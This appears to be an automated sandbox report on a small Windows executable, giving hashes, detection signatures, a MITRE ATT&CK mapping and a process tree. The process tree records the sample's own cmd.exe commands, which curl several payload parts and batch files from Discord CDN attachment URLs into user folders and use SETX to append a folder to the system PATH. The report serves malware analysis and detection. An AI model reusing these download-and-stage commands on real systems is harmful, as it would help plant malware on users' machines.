f2535bd1ebe93ae17e34bbbd77705f7dc0f3e4c9717e89a63aa50628b05a0396

General

Target

5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe
Size

14KB
MD5

5273b4cbdbcac4aead01f7895ecef8f0
SHA1

4b9b4f7705d26e32827fcf6b4b1045453fcf4bff
SHA256

f2535bd1ebe93ae17e34bbbd77705f7dc0f3e4c9717e89a63aa50628b05a0396
SHA512

72fbee17fbd245e05e09b36d35a605bc4ae36483e6f2cb96670024a3eb627c200c7bee8f35f2645ea755c03f5de001a86319e5947fa1e06162ff9697bd5a864a
SSDEEP

192:FIzpdC3JYKFj9uyD8bjknN+542TnVabqCm0ME5B72L3W:FIzp+Fj95D8bjknN+eWnUbqCm0dNG3

Score

3^/10

Malware Config

Signatures

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Program crash 1 IoCs

Processes:

WerFault.exe

pid pid_target process target process

2168 2644 WerFault.exe 5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe

pid	pid_target	process	target process
2168	2644	WerFault.exe	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe

description	pid	process
Token: SeDebugPrivilege	2644	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe
Token: SeDebugPrivilege	2644	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe

Suspicious use of WriteProcessMemory 48 IoCs

Processes:

5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.execmd.exe

description	pid	process	target process
PID 2644 wrote to memory of 2476	2644	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe	cmd.exe
PID 2644 wrote to memory of 2476	2644	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe	cmd.exe
PID 2644 wrote to memory of 2476	2644	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe	cmd.exe
PID 2644 wrote to memory of 2476	2644	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe	cmd.exe
PID 2644 wrote to memory of 2572	2644	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe	cmd.exe
PID 2644 wrote to memory of 2572	2644	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe	cmd.exe
PID 2644 wrote to memory of 2572	2644	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe	cmd.exe
PID 2644 wrote to memory of 2572	2644	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe	cmd.exe
PID 2644 wrote to memory of 2520	2644	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe	cmd.exe
PID 2644 wrote to memory of 2520	2644	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe	cmd.exe
PID 2644 wrote to memory of 2520	2644	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe	cmd.exe
PID 2644 wrote to memory of 2520	2644	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe	cmd.exe
PID 2644 wrote to memory of 2636	2644	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe	cmd.exe
PID 2644 wrote to memory of 2636	2644	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe	cmd.exe
PID 2644 wrote to memory of 2636	2644	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe	cmd.exe
PID 2644 wrote to memory of 2636	2644	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe	cmd.exe
PID 2644 wrote to memory of 3060	2644	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe	cmd.exe
PID 2644 wrote to memory of 3060	2644	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe	cmd.exe
PID 2644 wrote to memory of 3060	2644	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe	cmd.exe
PID 2644 wrote to memory of 3060	2644	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe	cmd.exe
PID 2644 wrote to memory of 2404	2644	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe	cmd.exe
PID 2644 wrote to memory of 2404	2644	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe	cmd.exe
PID 2644 wrote to memory of 2404	2644	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe	cmd.exe
PID 2644 wrote to memory of 2404	2644	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe	cmd.exe
PID 2644 wrote to memory of 2808	2644	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe	cmd.exe
PID 2644 wrote to memory of 2808	2644	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe	cmd.exe
PID 2644 wrote to memory of 2808	2644	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe	cmd.exe
PID 2644 wrote to memory of 2808	2644	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe	cmd.exe
PID 2644 wrote to memory of 2424	2644	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe	cmd.exe
PID 2644 wrote to memory of 2424	2644	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe	cmd.exe
PID 2644 wrote to memory of 2424	2644	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe	cmd.exe
PID 2644 wrote to memory of 2424	2644	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe	cmd.exe
PID 2808 wrote to memory of 2600	2808	cmd.exe	setx.exe
PID 2808 wrote to memory of 2600	2808	cmd.exe	setx.exe
PID 2808 wrote to memory of 2600	2808	cmd.exe	setx.exe
PID 2808 wrote to memory of 2600	2808	cmd.exe	setx.exe
PID 2644 wrote to memory of 2388	2644	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe	cmd.exe
PID 2644 wrote to memory of 2388	2644	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe	cmd.exe
PID 2644 wrote to memory of 2388	2644	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe	cmd.exe
PID 2644 wrote to memory of 2388	2644	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe	cmd.exe
PID 2644 wrote to memory of 2880	2644	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe	cmd.exe
PID 2644 wrote to memory of 2880	2644	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe	cmd.exe
PID 2644 wrote to memory of 2880	2644	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe	cmd.exe
PID 2644 wrote to memory of 2880	2644	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe	cmd.exe
PID 2644 wrote to memory of 2168	2644	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe	WerFault.exe
PID 2644 wrote to memory of 2168	2644	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe	WerFault.exe
PID 2644 wrote to memory of 2168	2644	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe	WerFault.exe
PID 2644 wrote to memory of 2168	2644	5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe	WerFault.exe

C:\Users\Admin\AppData\Local\Temp\5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe
"C:\Users\Admin\AppData\Local\Temp\5273b4cbdbcac4aead01f7895ecef8f0_NeikiAnalytics.exe"
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2644

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c md "%appdata%\Microsoft\CLR Security Config"
2⤵
PID:2476

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c curl https://cdn.discordapp.com/attachments/1128679075372867687/1128679774034862190/part_0.bin -o "%appdata%\Microsoft\MS1.bin"
2⤵
PID:2572

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c curl https://cdn.discordapp.com/attachments/1128679075372867687/1128693642463293500/protect.bat -o "%userprofile%\cmds\protect.bat"
2⤵
PID:2520

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c curl https://cdn.discordapp.com/attachments/1128679075372867687/1128693642857545948/unprotect.bat -o "%userprofile%\cmds\protect.bat"
2⤵
PID:3060

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c curl https://cdn.discordapp.com/attachments/1128679075372867687/1128679790489129042/part_1.bin -o "%appdata%\Microsoft\MS2.bin"
2⤵
PID:2636

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c curl https://cdn.discordapp.com/attachments/1128679075372867687/1128693666526011402/ipuwu.py -o "%userprofile%\cmds\protect.bat"
2⤵
PID:2404

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c SETX /M Path "%PATH%;%userprofile%\cmds"
2⤵
- Suspicious use of WriteProcessMemory
PID:2808

C:\Windows\SysWOW64\setx.exe
SETX /M Path "C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Users\Admin\cmds"
3⤵
PID:2600

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c curl https://cdn.discordapp.com/attachments/1128679075372867687/1128679797472645170/part_2.bin -o "%appdata%\Microsoft\MS3.bin"
2⤵
PID:2424

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c curl https://cdn.discordapp.com/attachments/1128679075372867687/1128679801574662256/part_3.bin -o "%appdata%\Microsoft\MS4.bin"
2⤵
PID:2388

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c curl https://cdn.discordapp.com/attachments/1128679075372867687/1128679696276672512/part_4.bin -o "%appdata%\Microsoft\MS5.bin"
2⤵
PID:2880

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2644 -s 1112
2⤵
- Program crash
PID:2168

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2644-0-0x0000000074D8E000-0x0000000074D8F000-memory.dmp

Filesize
4KB

Download
memory/2644-1-0x0000000000C20000-0x0000000000C2A000-memory.dmp

Filesize
40KB

Download

Analysis

Sharing